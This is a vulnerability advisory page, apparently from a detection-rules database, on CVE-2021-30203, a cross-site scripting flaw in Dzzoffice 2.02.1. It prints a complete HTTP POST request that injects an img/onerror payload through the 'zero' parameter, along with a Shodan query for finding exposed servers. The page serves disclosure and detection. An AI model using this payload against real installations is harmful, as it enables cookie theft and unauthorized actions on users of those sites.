🔙 목록으로 돌아가기

CVE-2021-30203: Dzzoffice 2.02.1 - Cross-Site Scripting

TitleDzzoffice 2.02.1 - Cross-Site Scripting
Authorarafatansari
SeverityHigh
ImpactAttackers can inject malicious JavaScript via XSS in the zero parameter, potentially stealing session cookies or performing unauthorized actions.
RemediationUpgrade to Dzzoffice version 2.02.2 or later.
CVSS Score7.2
EPSS Score0.01296
CVE IDCVE-2021-30203
CWE IDCWE-79
Shodan Queryhttp.html:"dzzoffice"
Tags cve cve2021 dzzoffice xss vuln

🔍 Vulnerability Description

Dzzoffice 2.02.1_SC_UTF8 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the zero parameter.

🌐 HTTP Request

POST /index.php?mod=system&op=orgtree&do=orgtree HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.6
Connection: close
Content-Length: 101
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip

id=%23&nouser=0&moderator=0&zero=<img+src=x+onerror=alert(document.domain)>&stype=0&range=0&showjob=0

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-30203.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-30203.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A